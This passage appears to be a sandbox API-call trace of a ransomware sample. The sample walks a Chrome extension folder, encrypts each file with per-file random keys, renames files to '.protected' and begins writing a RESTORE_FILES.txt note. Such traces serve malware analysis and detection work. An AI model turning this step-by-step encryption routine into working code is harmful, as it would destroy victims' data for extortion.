(lpString1="..", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\..") returned 126 [0081.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.291] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW (lpString1="8.1_0", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned 129 [0081.291] lstrcmpW (lpString1="8.1_0", lpString2=".") returned 1 [0081.291] lstrcmpW (lpString1="8.1_0", lpString2="..") returned 1 [0081.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*") returned 131 [0081.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0081.305] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.305] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.305] lstrcmpiW (lpString1=".", lpString2="System 
Volume Information") returned -1 [0081.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\.") returned 131 [0081.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.305] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.306] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.306] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.306] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\..") returned 132 [0081.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.306] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0081.306] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0081.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.306] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0081.306] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0081.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0081.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png") returned 137 [0081.308] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0081.308] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, 
lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x180f, lpOverlapped=0x0) returned 1 [0081.316] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffe7f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.316] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x180f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x180f, lpOverlapped=0x0) returned 1 [0081.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.317] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0081.317] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0081.317] CloseHandle (hObject=0x160) returned 1 [0081.318] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected") returned 147 [0081.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.protected")) returned 1 [0081.319] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0081.319] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0081.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.319] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0081.319] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.320] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x160 [0081.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0081.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0081.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0081.321] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0081.321] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x310, lpOverlapped=0x0) returned 1 [0081.331] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffcf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.331] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x310, lpOverlapped=0x0) returned 1 [0081.332] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.332] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0081.332] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0081.332] CloseHandle (hObject=0x160) returned 1 [0081.332] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected") returned 153 [0081.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.protected")) returned 1 [0081.333] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0081.333] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0081.333] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned 138 [0081.333] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0081.333] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0081.333] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*") returned 140 [0081.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.335] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\.") returned 140 [0081.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.335] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.336] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.336] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.336] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned 
-1 [0081.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\..") returned 141 [0081.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.336] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0081.336] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0081.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned 141 [0081.336] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0081.336] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0081.336] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*") returned 143 [0081.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.337] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.337] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0081.337] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.337] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.337] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.337] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\.") returned 143 [0081.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.337] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.337] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.338] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.338] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.338] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\..") returned 144 [0081.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.338] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.338] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.338] lstrcmpiW 
(lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.338] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.338] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.338] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.338] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.338] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.339] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.340] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.340] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0081.340] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.340] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x138, lpOverlapped=0x0) returned 1 [0081.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x138, lpOverlapped=0x0) returned 1 [0081.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.341] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.341] CloseHandle (hObject=0x168) returned 1 [0081.342] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected") returned 165 [0081.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0081.343] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.343] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.343] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0081.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 